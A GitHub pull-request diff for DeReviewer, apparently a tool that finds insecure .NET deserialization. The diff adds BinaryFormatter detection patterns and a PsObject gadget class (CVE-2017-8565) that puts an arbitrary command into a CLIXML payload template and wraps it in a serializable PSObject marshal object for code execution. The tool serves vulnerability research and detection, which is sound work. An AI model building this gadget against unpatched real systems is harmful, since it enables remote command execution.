Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Implemented PsObject gadget and added few patterns for binary formatter #1

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
121 changes: 60 additions & 61 deletions DeReviewer.Analysis/DeReviewer.Analysis.csproj
Original file line number Diff line number Diff line change
@@ -1,69 +1,68 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{495F718A-D925-4639-B6B9-00D00A17B3F6}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>DeReviewer.Analysis</RootNamespace>
<AssemblyName>DeReviewer.Analysis</AssemblyName>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="AssemblyInfo.cs" />
<Compile Include="CallGraph.cs" />
<Compile Include="CallGraphBuilder.cs" />
<Compile Include="CallGraphNode.cs" />
<Compile Include="CallInfo.cs" />
<Compile Include="GraphViz.cs" />
<Compile Include="IndexDB.cs" />
<Compile Include="MethodDefExtensions.cs" />
<Compile Include="MethodUniqueSignature.cs" />
<Compile Include="MethodUniqueSignatureExtensions.cs" />
<Compile Include="PatternInfo.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\dnlib\src\dnlib.csproj">
<Project>{f1b76fe5-8338-4bf6-9570-b285e852952b}</Project>
<Name>dnlib</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{495F718A-D925-4639-B6B9-00D00A17B3F6}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>DeReviewer.Analysis</RootNamespace>
<AssemblyName>DeReviewer.Analysis</AssemblyName>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="AssemblyInfo.cs" />
<Compile Include="CallGraph.cs" />
<Compile Include="CallGraphBuilder.cs" />
<Compile Include="CallGraphNode.cs" />
<Compile Include="CallInfo.cs" />
<Compile Include="GraphViz.cs" />
<Compile Include="IndexDB.cs" />
<Compile Include="MethodDefExtensions.cs" />
<Compile Include="MethodUniqueSignature.cs" />
<Compile Include="MethodUniqueSignatureExtensions.cs" />
<Compile Include="PatternInfo.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\dnlib\src\dnlib.csproj">
<Project>{f1b76fe5-8338-4bf6-9570-b285e852952b}</Project>
<Name>dnlib</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->

</Project>
</Project>
140 changes: 93 additions & 47 deletions DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs
Original file line number Diff line number Diff line change
@@ -4,52 +4,98 @@

namespace DeReviewer.KnowledgeBase.Cases
{
public class BinaryFormatterPatterns : Case
{
public void Deserialize()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.Deserialize(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>()));
}

public void DeserializeHeaderHandler()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.Deserialize(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
null));
}

public void DeserializeMethodResponse()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.DeserializeMethodResponse(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
null,
null));
}

public void UnsafeDeserialize()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.UnsafeDeserialize(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
null));
}

public void UnsafeDeserializeMethodResponse()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.UnsafeDeserializeMethodResponse(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
null,
null));
}
public class BinaryFormatterPatterns : Case
{
public void DeserializeTypeConfuseDelegate()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.Deserialize(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>()));
}

public void DeserializePsObject()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.Deserialize(
it.IsPayloadOf<PsObject>().Format<Binary>()));
}

public void DeserializeHeaderHandlerTypeConfuseDelegate()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.Deserialize(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
null));
}

public void DeserializeHeaderHandlerPsObject()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.Deserialize(
it.IsPayloadOf<PsObject>().Format<Binary>(),
null));
}

public void DeserializeMethodResponseTypeConfuseDelegate()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.DeserializeMethodResponse(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
null,
null));
}

public void DeserializeMethodResponsePsObject()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.DeserializeMethodResponse(
it.IsPayloadOf<PsObject>().Format<Binary>(),
null,
null));
}

public void UnsafeDeserializeTypeConfuseDelegate()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.UnsafeDeserialize(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
null));
}

public void UnsafeDeserializePsObject()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.UnsafeDeserialize(
it.IsPayloadOf<PsObject>().Format<Binary>(),
null));
}

public void UnsafeDeserializeMethodResponseTypeConfuseDelegate()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.UnsafeDeserializeMethodResponse(
it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
null,
null));
}

public void UnsafeDeserializeMethodResponsePsObject()
{
var serializer = new BinaryFormatter();
Pattern.CreateBySignature(it =>
serializer.UnsafeDeserializeMethodResponse(
it.IsPayloadOf<PsObject>().Format<Binary>(),
null,
null));
}
}
}
5 changes: 5 additions & 0 deletions DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj
Original file line number Diff line number Diff line change
@@ -37,6 +37,9 @@
<Reference Include="PresentationFramework" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
<HintPath>..\packages\Microsoft.PowerShell.5.ReferenceAssemblies.1.1.0\lib\net4\System.Management.Automation.dll</HintPath>
</Reference>
<Reference Include="System.Xaml" />
<Reference Include="System.Xml" />
<Reference Include="WindowsBase" />
@@ -67,6 +70,7 @@
<Compile Include="Formatters\Binary.cs" />
<Compile Include="Formatters\Xaml.cs" />
<Compile Include="Gadgets\ObjectDataProvider.cs" />
<Compile Include="Gadgets\PsObject.cs" />
<Compile Include="Gadgets\TypeConfuseDelegate.cs" />
<Compile Include="PayloadGenerationMode.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
@@ -77,6 +81,7 @@
</ItemGroup>
<ItemGroup>
<None Include="packages.config" />
<Content Include="Payloads\PsObject.clixml" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\DeReviewer.Analysis\DeReviewer.Analysis.csproj">
39 changes: 39 additions & 0 deletions DeReviewer.KnowledgeBase/Gadgets/PsObject.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
using System;
using System.IO;
using System.Management.Automation;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

namespace DeReviewer.KnowledgeBase.Gadgets
{
// PsObject Gadget by Alvaro Munoz and Oleksandr Mirosh.
// Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)
internal class PsObject : IGadget
{
public object Build(string command)
{
string clixmlData = File.ReadAllText(@"Payloads\PsObject.clixml")
.Replace("%CMD%", command);

return new PsObjectMarshal(clixmlData);
}
}

[Serializable]
internal class PsObjectMarshal : ISerializable
{
private readonly string clixmlData;

public void GetObjectData(SerializationInfo info, StreamingContext context)
{
Type typePso = typeof(PSObject);
info.SetType(typePso);
info.AddValue("CliXml", clixmlData);
}

public PsObjectMarshal(string clixmlData)
{
this.clixmlData = clixmlData;
}
}
}
Loading